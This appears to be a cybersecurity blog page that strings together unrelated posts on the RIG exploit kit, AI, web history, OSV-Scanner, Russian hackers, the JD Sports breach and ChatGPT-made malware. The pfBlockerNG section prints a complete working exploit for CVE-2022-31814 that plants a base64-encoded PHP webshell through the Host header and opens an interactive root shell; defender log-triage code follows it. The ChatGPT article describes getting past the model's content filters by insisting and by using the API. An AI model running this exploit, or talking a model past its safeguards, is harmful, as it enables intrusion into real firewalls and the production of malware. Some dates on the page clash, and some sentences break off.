Wednesday, January 15, 2025

Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer


The RIG Exploit Kit is currently in the midst of its most productive phase, attempting approximately 2,000 incursions every day and succeeding in about 30% of them, the best success rate in the long operational history of the service.

RIG EK has been observed distributing several malware families, including Dridex, SmokeLoader, and RaccoonStealer, by exploiting relatively old Internet Explorer vulnerabilities.

The exploit kit continues to pose a serious, widespread threat to people and organisations, according to a thorough study by Prodaft, whose researchers have access to the service’s backend web panel.

RIG EK’s sordid history

RIG EK was first released eight years ago, in 2014, and promoted as an “exploit-as-a-service” rented to other malware operators to spread their malware on vulnerable devices.

The RIG exploit kit is a set of malicious JavaScript scripts embedded in compromised or malicious websites by the threat actors, which are then promoted through malvertising.

When a user visits these sites, the malicious scripts will be executed and attempt to exploit various vulnerabilities in the browser to install malware on the device automatically.

In 2015, the kit’s authors released the second major version of the kit, laying the ground for more extensive and successful operations.

In 2017 though, RIG suffered a significant blow following a coordinated takedown action that wiped out large parts of its infrastructure, severely disrupting its operations.

In 2019, RIG returned, this time focusing on ransomware distribution, helping Sodinokibi (REvil), Nemty, and ERIS ransomware compromise organizations with data-encrypting payloads.

Current attack volumes

Prodaft says RIG EK currently targets 207 countries, launching an average of 2,000 attacks per day and having a current success rate of 30%. This rate was 22% before the exploit kit resurfaced with two new exploits, says Prodaft.

Infection attempts and successful intrusions for 2022 (Prodaft)

As the heatmap published in the report shows, the most impacted countries are Germany, Italy, France, Russia, Turkey, Saudi Arabia, Egypt, Algeria, Mexico, and Brazil. However, there are victims worldwide.

Victims of RIG EK (Prodaft)

The highest success rate is brought by CVE-2021-26411, achieving a 45% successful exploitation ratio, followed by CVE-2016-0189 with 29% and CVE-2019-0752 with 10%.

Exploits used by RIG EK, and their success ratio (Prodaft)

“The RIG administrator had taken additional manual configuration steps to ensure that the malware was distributed smoothly,” explains Prodaft in the report.

“Considering all these facts, we assess with high confidence that the developer of Dridex malware has a close relationship with the RIG’s admins.”

RIG EK infections may also lead to data-encrypting attacks, as Dridex was previously connected to Entropy ransomware outbreaks.

The RIG EK continues to pose a serious threat to people and companies running out-of-date software, threatening to infect their computers with stealthy information stealers that can take highly sensitive data.

Nevertheless, because Microsoft officially terminated Internet Explorer in February 2023 and redirected users to Microsoft Edge, RIG EK’s emphasis on Internet Explorer may cause the service to quickly become obsolete.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!


Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

The Rise and Rise of AI


Artificial intelligence (AI), one of the most transformational technologies of our time, has quickly come into the spotlight. AI has completely changed how we live, work, and interact with the world around us, from virtual personal assistants to self-driving cars. In this post, we examine the emergence of AI, its effects on many businesses, and the difficulties it poses.

The Emergence of AI

The idea of artificial intelligence (AI) first emerged in the middle of the 20th century when academics looked at how to reproduce human intelligence in machines. Modern AI was created as a result of substantial developments in the decades that followed in disciplines including machine learning, natural language processing, and computer vision.

AI applications have increased dramatically in recent years as a result of the growth of big data and improvements in computing power. Today, artificial intelligence (AI) is used in a wide range of sectors, from manufacturing and transportation to healthcare and finance.

Impact on Industries

The impact of AI on various industries has been significant. In healthcare, for example, AI is being used to help diagnose diseases, analyze medical images, and develop personalized treatment plans. In finance, AI is being used to analyze large volumes of data to identify patterns and make more accurate predictions.

In manufacturing, AI is being used to automate repetitive tasks and improve efficiency. For example, AI-powered robots are being used to perform assembly line tasks, while AI algorithms are being used to optimize production schedules and reduce waste.

In transportation, AI is being used to develop autonomous vehicles that can operate more safely and efficiently than human-driven vehicles. These vehicles are equipped with sensors and cameras that can detect obstacles, and they use AI algorithms to make decisions about how to navigate through traffic.

Improved data analysis capabilities with greater ability to predict potential outcomes. Optimisation of business processes as well as innovation in current and new products. AI will be able to provide customers with higher levels of personalised services. The aim being to increase engagement and improve their 

Challenges

Despite its many benefits, AI also presents a number of challenges. One of the biggest challenges is the potential for job displacement. As AI becomes more advanced, there is a risk that many jobs will become automated, leading to significant job losses in certain industries.

Another challenge is the potential for bias in AI systems. AI algorithms are only as unbiased as the data they are trained on, and if that data is biased, the algorithm will be biased as well. This can lead to discriminatory outcomes, particularly in areas such as hiring and lending.

Finally, there is the challenge of regulation. As AI becomes more advanced, there is a need for clear regulations to ensure that it is developed and used in an ethical and responsible manner.

Is AI Here to Stay?

I think it’s a silly question today, in 2023. AI can be found in more places than not when it comes to technology. From home automation use cases to supporting the role of the Internet of Medical Things to chatbots, you name it: AI is everywhere.

Did you know that we now consume safer and cheaper food thanks to AI? How is your food safer and less expensive thanks to artificial intelligence? In two words: “crop disease detection using machine learning.” Oops! That was unquestionably more than two. Deep learning techniques can be used to train computer vision or camera-based systems for image-based plant disease identification and patch detection.

Conclusion

From its infancy to its widespread use across numerous industries, the emergence of AI has been a wonderful journey. New opportunities and problems will undoubtedly arise as AI develops and becomes more sophisticated. To fully achieve AI’s potential to enhance our lives and the world around us, it is up to us to make sure that we create and utilise it in a responsible and ethical manner.


Evolution of The World Wide Web (WWW)


The World Wide Web (WWW) has arguably gone through a mind-blowing amount of transformation since its inception in 1989. From a modest idea for sharing information among scientists to a revolutionary platform for global communication and commerce, the WWW has radically transformed the way we live, work, and play. In this blog post, we’ll take a journey through the evolution of the WWW and uncover how it has revolutionized the world as we know it. Buckle up and get ready to embark on an incredible ride!

The Early Days of the WWW

The idea for the WWW was first proposed by Tim Berners-Lee, a British computer scientist, in 1989. At the time, Berners-Lee was working at CERN, the European Organization for Nuclear Research, and he wanted to create a system that would allow scientists to share information and collaborate more easily. He developed the first web server, the first web browser, and the first web pages, all of which were based on a simple language called HTML (Hypertext Markup Language).

In the early days of the WWW, there were only a few hundred websites, and most of them were hosted on servers located in the United States and Europe. These websites were primarily focused on academic research and information sharing, and the idea of using the web for commercial purposes had not yet taken hold.

The Rise of the Dot-Com Era

In the mid-1990s, the WWW began to explode in popularity as more and more people started to use it for communication and commerce. This was the era of the dot-com boom, and companies like Amazon, Google, and Yahoo were founded on the idea of using the web to create new business models.

During this time, the web became more interactive and dynamic, with the introduction of technologies like JavaScript and Flash that allowed for more engaging and interactive web experiences. This led to the development of new types of websites, such as online marketplaces, social networks, and multimedia platforms.

The Mobile Revolution

In the early 2000s, the rise of mobile devices like smartphones and tablets changed the way people accessed the web. Mobile devices required websites to be optimized for smaller screens and slower connections, which led to the development of responsive web design and mobile-first approaches to web development.

This shift towards mobile devices also led to the development of new types of web-based applications, such as mobile apps and progressive web apps (PWAs), which are designed to work seamlessly across different devices and platforms.

The Future of the Web

As we look to the future, it’s clear that the web will continue to evolve and change in response to new technologies and user needs. Some of the key trends that are likely to shape the future of the web include:

  • The continued growth of mobile and other connected devices, such as smart homes and wearable technology
  • The increasing use of artificial intelligence and machine learning to create more personalized and intelligent web experiences
  • The rise of blockchain and other decentralized technologies, which could lead to new models for content creation and distribution on the web
  • The development of new types of interfaces and user experiences, such as voice-based interactions and virtual and augmented reality

In conclusion, the evolution of the WWW has been a fascinating journey, from its humble beginnings as a simple tool for sharing information among scientists to a global platform that connects people and businesses around the world. As we look to the future, it’s clear that the web will continue to evolve and change, and it will be exciting to see how it develops in the years to come.


pfBlockerNG 2.1.4_26 – (RCE) Remote Code Execution


A Remote Code Execution Vulnerability was discovered in pfBlockerNG 2.1.4_26 by Security Researcher(s) @IHTeam





# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: http[s]://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: http[s]://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: http[s]://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: http[s]://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
 
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
 
url = args.url
shell_filename = "system_advanced_control.php"
 
def check_endpoint(url):
	response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
	if response.status_code == 200:
		print("[+] pfBlockerNG is installed")
	else:
		print("\n[-] pfBlockerNG not installed")
		sys.exit()
 
def upload_shell(url, shell_filename):
	payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
	print("[/] Uploading shell...")
	response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
	time.sleep(2)
	response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
	if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
		print("[+] Upload succeeded")
	else:
		print("\n[-] Error uploading shell. Probably patched ", response.content)
		sys.exit()
 
def interactive_shell(url, shell_filename, cmd):
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
	print(str(response.text)+"\n")
 
 
def delete_shell(url, shell_filename):
	delcmd = "rm /usr/local/www/system_advanced_control.php"
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
	print("\n[+] Shell deleted")
 
check_endpoint(url)
upload_shell(url, shell_filename)
try:
	while True:
		cmd = input("# ")
		interactive_shell(url, shell_filename, cmd)
except:
	delete_shell(url, shell_filename)
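
For defenders, the script above leaves three observable traces: a request to /pfblockerng/www/index.php whose Host header is not a hostname, a new file /usr/local/www/system_advanced_control.php, and later requests to that file with a c= parameter. The following log triage is an added example, not part of the original advisory or of pfSense; it assumes an nginx access log whose format has been extended with host="$http_host" (a hypothetical layout), and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Assumed log layout (not a pfSense default): nginx "combined"-style fields
# followed by host="$http_host", so the raw Host header can be reviewed.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'host="(?P<host>.*)"$'
)

# A well-formed Host header is a hostname, IPv4 address or bracketed IPv6
# literal with an optional port. Quotes, spaces, ';' and '|' never belong there.
VALID_HOST_RE = re.compile(
    r'^(?:[A-Za-z0-9.-]+|\[[0-9A-Fa-f:.]+\])(?::\d{1,5})?$'
)

PFB_PREFIX = "/pfblockerng/"                 # package path requested by the script
SHELL_PATH = "/system_advanced_control.php"  # file name the script writes

# Constructed sample lines (documentation IP ranges, payload elided).
SAMPLE_LOG = """
198.51.100.7 - - [05/Sep/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 host="fw.example.test"
203.0.113.9 - - [05/Sep/2022:10:02:13 +0000] "GET //pfblockerng/www/index.php HTTP/1.1" 200 43 host="fw.example.test:443"
203.0.113.9 - - [05/Sep/2022:10:02:14 +0000] "GET //pfblockerng/www/index.php HTTP/1.1" 200 43 host="' *; echo '<base64 elided>'|python3.8 -m base64 -d | php; '"
203.0.113.9 - - [05/Sep/2022:10:02:16 +0000] "GET //system_advanced_control.php?c=id HTTP/1.1" 200 52 host="fw.example.test:443"
203.0.113.9 - - [05/Sep/2022:10:05:40 +0000] "GET //system_advanced_control.php?c=rm%20%2Fusr%2Flocal%2Fwww%2Fsystem_advanced_control.php HTTP/1.1" 200 0 host="fw.example.test:443"
198.51.100.20 - - [06/Sep/2022:08:00:00 +0000] "GET /system_advanced_control.php?c=id HTTP/1.1" 404 0 host="fw.example.test"
""".strip().splitlines()


def triage(lines):
    """Return (line_number, client, kind, detail) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the assumed format; review such lines separately
        raw_path, _, query = m["target"].partition("?")
        # The script joins a URL ending in "/" with "/pfblockerng/...", so the
        # logged path can start with "//"; collapse repeated slashes first.
        path = re.sub(r"/{2,}", "/", raw_path)
        client, host = m["client"], m["host"]

        if not VALID_HOST_RE.match(host):
            kind = ("host-header-injection" if path.startswith(PFB_PREFIX)
                    else "malformed-host")
            findings.append((lineno, client, kind, host))

        if path == SHELL_PATH:
            # Decode the command so responders can see what was executed.
            cmd = " ".join(parse_qs(query).get("c", []))
            # 200 means the file existed and answered; anything else is a probe.
            kind = "webshell-hit" if m["status"] == "200" else "webshell-probe"
            findings.append((lineno, client, kind, cmd))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Because the script deletes the file on exit, a missing /usr/local/www/system_advanced_control.php does not rule out compromise; the access log entries remain the more durable evidence.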
            


Google Open-Source Vulnerability Scanning Tool


OSV-Scanner, a front-end interface to the Open Source Vulnerability (OSV) database, was made available by Google in December 2022. The OSV database is a distributed, open-source database that keeps OSV-formatted vulnerability data. By comparing a project’s dependencies to the OSV database, OSV-Scanner determines all vulnerabilities that pertain to the project.

When it is executed on a project, OSV-Scanner first ascertains all the dependencies in use by inspecting manifests, software bills of materials (SBOMs), and commit hashes.

This data is used to query the OSV database and report any vulnerabilities that affect the project.

Vulnerabilities are reported in a table or, optionally, in the JSON-based OSV format.

The OSV format provides a machine-readable JSON schema for presenting vulnerability information. The format is designed to enforce version specification that aligns with the naming and schemes used in the actual open-source package. Oliver Chang, senior staff engineer at Google, and Russ Cox, distinguished engineer at Google, state that this approach “can be used to describe vulnerabilities in any open source ecosystem, while not requiring ecosystem-dependent logic to process them.”

Running osv-scanner -r /path/to/your/dir searches a directory for lockfiles, SBOMs, and git folders. A recursive scan is enabled via the optional -r flag. Package URL-based SBOMs for SPDX and CycloneDX are currently supported. Several lockfiles, including yarn.lock, composer.lock, go.mod, and Gemfile.lock, are currently supported.

It is also possible to scan the list of installed packages in a Debian image to pull out any vulnerabilities for them: $ osv-scanner --docker image_name:latest. This requires docker to be installed and does not currently scan the filesystem of the Docker container. More details on this preview feature can be found in the GitHub issue.

OSV-Scanner can be configured to ignore vulnerabilities by their ID. This feature also supports optionally providing a date for when the ignore will expire and a reason. Ignored vulnerabilities are specified under the IgnoreVulns key.
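
To make the OSV format and the ignore feature described above concrete, here is an added example (not OSV-Scanner's own code) that matches dependency versions against OSV-style records and then applies ignores with an expiry date. The record IDs and package names are constructed, only SEMVER ranges with plain numeric versions are handled, and the ignore list is a hypothetical in-memory structure rather than OSV-Scanner's configuration file syntax; treating an ignore as expired on its stated date is also an assumption.

```python
from datetime import date


def parse_semver(text):
    """Parse 'MAJOR.MINOR.PATCH' into a tuple; pre-release tags are dropped."""
    core = text.lstrip("v").split("-", 1)[0].split("+", 1)[0]
    parts = [int(p) for p in core.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))  # "0" becomes (0, 0, 0)


def in_range(version, events):
    """Walk OSV range events in version order.

    A version is affected from an 'introduced' event up to the next 'fixed'
    (exclusive) or 'last_affected' (inclusive) event.
    """
    v = parse_semver(version)
    timeline = sorted(
        ((parse_semver(value), kind)
         for event in events for kind, value in event.items()
         if kind in ("introduced", "fixed", "last_affected")),
        key=lambda item: item[0],
    )
    affected = False
    for point, kind in timeline:
        if kind == "introduced" and v >= point:
            affected = True
        elif kind == "fixed" and v >= point:
            affected = False
        elif kind == "last_affected" and v > point:
            affected = False
    return affected


def matches(record, ecosystem, name, version):
    """True if the OSV record lists this package version as affected."""
    for aff in record.get("affected", []):
        pkg = aff.get("package", {})
        if (pkg.get("ecosystem"), pkg.get("name")) != (ecosystem, name):
            continue
        if version in aff.get("versions", []):
            return True
        for rng in aff.get("ranges", []):
            if rng.get("type") == "SEMVER" and in_range(version, rng["events"]):
                return True
    return False


def scan(dependencies, records, ignores, today):
    """Return (reported, suppressed) lists of (name, version, vuln_id)."""
    active = {i["id"] for i in ignores
              if i.get("ignore_until") is None or today < i["ignore_until"]}
    reported, suppressed = [], []
    for ecosystem, name, version in dependencies:
        for record in records:
            if matches(record, ecosystem, name, version):
                hit = (name, version, record["id"])
                (suppressed if record["id"] in active else reported).append(hit)
    return reported, suppressed


# Constructed OSV-style records; IDs and package names are not real advisories.
RECORDS = [
    {"id": "EXAMPLE-2022-0001", "affected": [{
        "package": {"ecosystem": "npm", "name": "example-parser"},
        "ranges": [{"type": "SEMVER", "events": [
            {"introduced": "0"}, {"fixed": "1.4.2"},
            {"introduced": "2.0.0"}, {"fixed": "2.1.0"}]}]}]},
    {"id": "EXAMPLE-2022-0002", "affected": [{
        "package": {"ecosystem": "npm", "name": "example-http"},
        "ranges": [{"type": "SEMVER", "events": [
            {"introduced": "3.0.0"}, {"last_affected": "3.2.1"}]}]}]},
]
DEPENDENCIES = [
    ("npm", "example-parser", "2.0.5"),
    ("npm", "example-http", "3.2.1"),
    ("npm", "example-http", "3.2.2"),
]
IGNORES = [{"id": "EXAMPLE-2022-0002", "ignore_until": date(2023, 1, 31),
            "reason": "affected code path is not reachable (constructed)"}]

if __name__ == "__main__":
    print(scan(DEPENDENCIES, RECORDS, IGNORES, today=date(2023, 1, 15)))
    print(scan(DEPENDENCIES, RECORDS, IGNORES, today=date(2023, 2, 1)))
```

Once the ignore date passes, the suppressed finding is reported again, which is what the expiry date on an ignore is for.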

OSV-Scanner has also been integrated into the OpenSSF Scorecard’s Vulnerabilities check. Scorecards is an automated security tool that identifies risky supply chain practices in open-source projects. This extends Scorecards analysis from the project’s direct vulnerabilities to also include any vulnerabilities within the project’s dependencies.

Rex Pan, software engineer at Google, shared some details on what is next for OSV-Scanner. The team is looking to offer a standalone CI action to enable further integration into workflows. Pan shared that they are looking to improve C and C++ support by “building a high quality database of C/C++ vulnerabilities by adding precise commit level metadata to CVEs.”

OSV-Scanner is available via GitHub under the Apache License 2.0. More details on the announcement can be found in the release blog post.


The Shadow Warriors: The Rise of Russian State Hackers


Hacking is a shadowy world, with shadowy characters working behind the scenes to gain access to sensitive information and cause chaos. But when it comes to state-sponsored hacking, one group stands out – Russian state hackers.

In recent years, the rise of Russian state hackers has become a major concern for governments and organizations around the world. These groups are believed to be working on behalf of the Russian government, using their skills to gather intelligence, interfere in elections, steal valuable data, and, more recently, wage cyber-warfare in corre

So, who are these shadow warriors, and what makes them so dangerous?

  • Skill and expertise: Russian state hackers are some of the most skilled and advanced in the world. They use cutting-edge techniques and tools to gain access to sensitive information and systems, making it difficult for security experts to defend against them.
  • Stealth and cunning: Russian state hackers are known for their ability to operate in the shadows, using stealth and cunning to avoid detection and evade the authorities. They use tactics such as spear-phishing, social engineering, and malware attacks to gain access to sensitive information.
  • State backing: Perhaps the most dangerous aspect of Russian state hackers is the support they receive from the Russian government. With the full backing of the state, they have access to resources, technology, and information that other hacking groups could only dream of.

The consequences of a successful attack by Russian state hackers can be devastating. For example, the 2016 US presidential election was heavily influenced by Russian state hackers, who used stolen data and propaganda to interfere in the election process. More recently, Russian state hackers have been accused of targeting major corporations and stealing sensitive data and intellectual property.

In another historical example, on December 23, 2015, the power grid in two western oblasts of Ukraine was hacked, which resulted in power outages for roughly 230,000 consumers in Ukraine for 1-6 hours. The attack took place during the ongoing Russo-Ukrainian War (2014-present) and is attributed to a Russian advanced persistent threat group known as “Sandworm”. It was the first publicly acknowledged successful cyberattack on a power grid.

So, what can we do to protect ourselves from the threat of Russian state hackers? The answer is simple – be aware and be prepared. Organizations should invest in cybersecurity measures, such as firewalls, antivirus software, and two-factor authentication, to protect against attacks. Additionally, employees should be trained to recognize and avoid phishing scams and other tactics used by Russian state hackers.

In conclusion, the rise of Russian state hackers is a major concern for the digital world. Their skills, stealth, and state backing make them a formidable force that can cause serious damage. It’s up to us to be aware of the threat and take the necessary steps to protect ourselves and our information. The digital world is our reality, and it’s time to start treating it as such.


“What Came First, Cyber or Security?”: The Timeless Debate That Shapes Our Digital World


The digital world is constantly evolving, and with each new advancement comes a new set of challenges. One debate that has been ongoing for decades is the question of what came first, cyber or security? If you’ve ever asked yourself this question, then you’re in the right place. In this blog post, we’ll dive into the timeless debate that shapes our digital world and explore the relationship between cyber and security.

Imagine a world without the internet, computers, and smartphones. How would we communicate, store information, and access entertainment? The answer is simple – we wouldn’t. The use of technology, or what we call “cyber,” has revolutionized the way we live, work, and play. But as technology has advanced, so have the cyber threats that come with it. From hacking to phishing to malware attacks, the dangers of the digital world are very real. And that’s where security comes in.

Security refers to the practice of protecting computers, networks, and data from unauthorized access, use, disclosure, disruption, modification, or destruction. It’s the guardian angel of the digital world, ensuring that our sensitive information stays safe and secure. But the question remains – did cyber come first, and security followed in its wake, or was it the other way around?

In a sense, it’s a never-ending cycle. As technology advanced, the need for security measures grew. And as security measures were developed, technology continued to advance. It’s a chicken-and-egg scenario, and the debate may never be fully resolved. But what we do know is that cyber and security are intertwined and rely on each other to function effectively.

So, what does the future hold? As technology continues to evolve, the need for cybersecurity measures will only become more important. It’s crucial for individuals, businesses, and governments to prioritize and invest in cybersecurity to stay ahead of the constantly evolving threat landscape. The digital world is our reality, and it’s up to us to shape it for the better.

In conclusion, the debate of what came first, cyber or security, may never be fully resolved. But what we do know is that they are two sides of the same coin, and their relationship will shape the future of our digital world. Are you ready to take the leap into the digital future, with cyber and security by your side?


JD Sports: Cyber Attack affects 10 million customers


Following a cyber-attack, sportswear retailer JD Sports warned that stored information about 10 million consumers may be in danger.

The business claimed that names, addresses, email addresses, phone numbers, order information, and the last four digits of bank cards were among the data that hackers “may have acquired.”

The information concerned purchases made online between November 2018 and October 2020.

Affected customers were being contacted, according to JD Sports.

According to the group, the affected data was “minimal.” It noted that it didn’t have all of the payment card information and didn’t think the hackers had access to account passwords.

“We want to apologise to those customers who may have been affected by this incident,” said Neil Greenhalgh, chief financial officer of JD Sports. “Protecting the data of our customers is an absolute priority for JD.”

The attack related to online orders placed for the JD, Size?, Millets, Blacks, Scotts and MilletSport brands and it is understood it was detected by the company in recent days, but only the historical data was accessed.

The company said it was working with “leading cyber-security experts” and was engaging with the UK’s Information Commissioner’s Office (ICO) in response to the incident.

Mr Greenhalgh said affected customers were being advised “to be vigilant about potential scam e-mails, calls and texts”.

This isn’t the first incident for JD Sports: the company suffered a data breach in 2021, affecting the personal and financial information of its customers. The breach was discovered by the company’s cybersecurity team, who immediately launched an investigation into the matter.


InfoSec – A Newbie Guide – InfoSecurity


Information security, also known as cybersecurity, is the practice of protecting sensitive information from unauthorized access, use, disclosure, disruption, modification, or destruction. With the increasing amount of personal and business data being stored and shared online, information security has become a critical concern for individuals, organizations, and governments.

One of the biggest challenges in information security is the constantly evolving threat landscape. Hackers and cybercriminals are constantly developing new methods to gain access to sensitive information, and it’s important for organizations to stay up-to-date on the latest threats and take proactive measures to protect their data.

One of the most effective ways to protect against cyber threats is through the use of strong passwords and two-factor authentication. Strong passwords, which include a combination of letters, numbers, and special characters, are much more difficult for hackers to guess or crack. Two-factor authentication adds an extra layer of security by requiring users to provide a second form of verification, such as a fingerprint or code sent to a mobile phone, in addition to a password.

Another important aspect of information security is the use of encryption to protect sensitive information. Encryption is the process of converting plain text into a coded form that can only be accessed by someone with the decryption key. This ensures that even if sensitive information is intercepted, it will be unreadable to anyone without the key.

Another key component of information security is employee education and training. It is important to educate all employees about the risks of cyber attacks and the steps they can take to protect themselves and the organization. This includes training on how to identify phishing emails, how to handle sensitive information, and how to report any suspicious activity.

In addition, organizations should have incident response plans in place so they can respond quickly and effectively to a cyber attack. This includes regular backups of important data, as well as a plan for restoring operations in the event of a disruption.

In conclusion, information security is a critical concern for individuals and organizations in today’s digital age. By taking a proactive approach to protecting sensitive information through the use of strong passwords, two-factor authentication, encryption, employee education, and incident response planning, organizations can reduce the risk of a successful cyber attack and protect their valuable data.

Did You Know?

  • Cybercrime is one of the fastest growing criminal activities in the world, with global losses estimated to reach $6 trillion annually by 2021.
  • Phishing is one of the most common methods used by cybercriminals to gain access to sensitive information, with more than 90% of all cyber-attacks starting with a phishing email.
  • The average cost of a data breach for a company is $3.86 million.
  • Small and medium-sized businesses are increasingly becoming targets for cybercriminals, as they often have weaker security measures in place.
  • The average time to detect a data breach is 206 days, and the average time to contain a data breach is 73 days.
  • The healthcare industry is one of the most targeted sectors for cyber attacks, due to the sensitive nature of the information stored in their systems.
  • The use of cloud-based services has led to an increase in the number of data breaches caused by third-party vendors.
  • The global cybersecurity workforce is expected to have 3.5 million unfilled jobs by 2021.
  • The use of artificial intelligence and machine learning is becoming increasingly important in the fight against cybercrime, as it allows for the automation of threat detection and response.
  • The Internet of Things (IoT) is creating new security challenges, as the increased number of connected devices provides more opportunities for cybercriminals to gain access to sensitive information.


Polymorphic Malware Produced by ChatGPT


OpenAI’s ChatGPT has reportedly created a new strain of polymorphic malware following text-based interactions with cybersecurity researchers at CyberArk.

The malware developed using ChatGPT may “easily circumvent security products and make mitigation difficult with very little effort or expenditure by the adversary,” according to a technical write-up that the company recently shared with Infosecurity.

Eran Shimony and Omer Tsarfati of CyberArk Security explain in their study that the initial stage in building the malware was to get past the content filters that were prohibiting ChatGPT from producing dangerous tools.

To accomplish this, the CyberArk researchers simply insisted, asking the same question in a more authoritative manner.

Shimony and Tsarfati noted that, “interestingly, we acquired a functioning code by requesting ChatGPT to execute the same thing utilising various restrictions and asking it to obey.”

Further, the researchers noted that when using the API version of ChatGPT (as opposed to the web version), the system reportedly does not seem to utilize its content filter.

“It is unclear why this is the case, but it makes our task much easier as the web version tends to become bogged down with more complex requests,” reads the CyberArk report.

Shimony and Tsarfati then used ChatGPT to mutate the original code, thus creating multiple variations of it.

“In other words, we can mutate the output on a whim, making it unique every time. Moreover, adding constraints like changing the use of a specific API call makes security products’ lives more difficult.”

Thanks to the ability of ChatGPT to create and continually mutate injectors, the cybersecurity researchers were able to create a polymorphic program that is highly elusive and difficult to detect.

“By utilizing ChatGPT’s ability to generate various persistence techniques, Anti-VM modules and other malicious payloads, the possibilities for malware development are vast,” explained the researchers.

“While we have not delved into the details of communication with the C&C server, there are several ways that this can be done discreetly without raising suspicion.”

CyberArk said that it will further develop and expound on this research and that it plans to make some of the source code available for educational purposes.

The report comes days after Check Point Research discovered ChatGPT being used to develop new malicious tools, including infostealers, multi-layer encryption tools and dark web marketplace scripts.
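Why code that is "unique every time" defeats hash-based signatures, seen from the detection side. This is an added example, not code from the CyberArk report or from this article; the three snippets are constructed, harmless samples and all function names are hypothetical.

```python
import ast
import hashlib

# Constructed, harmless samples: the same logic written three ways.
VARIANT_A = """
def total(items):
    result = 0
    for item in items:
        result += len(item)
    return result
"""
VARIANT_B = """
def t(xs):
    # identifiers renamed, comment added
    acc = 0
    for x in xs:
        acc += len(x)
    return acc
"""
VARIANT_C = """
def t(xs):
    return sum(map(len, xs))
"""

class _Rename(ast.NodeTransformer):
    """Replace every identifier with a placeholder in first-seen order."""
    def __init__(self):
        self.names = {}
    def _alias(self, name):
        return self.names.setdefault(name, f"v{len(self.names)}")
    def visit_FunctionDef(self, node):
        node.name = self._alias(node.name)
        return self.generic_visit(node)
    def visit_arg(self, node):
        node.arg = self._alias(node.arg)
        return node
    def visit_Name(self, node):
        node.id = self._alias(node.id)
        return node

def byte_hash(src):
    """Classic file signature: SHA-256 over the raw bytes."""
    return hashlib.sha256(src.encode()).hexdigest()

def structure_hash(src):
    """Fingerprint of the syntax tree, ignoring names, comments and layout."""
    tree = _Rename().visit(ast.parse(src))
    return hashlib.sha256(ast.dump(tree).encode()).hexdigest()

def compare(a, b):
    return {"bytes_match": byte_hash(a) == byte_hash(b),
            "structure_match": structure_hash(a) == structure_hash(b)}
```

Variants A and B differ in their byte hash but share a structural fingerprint; variant C behaves identically yet matches neither, which is why static signatures need to be backed by behaviour-based detection.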
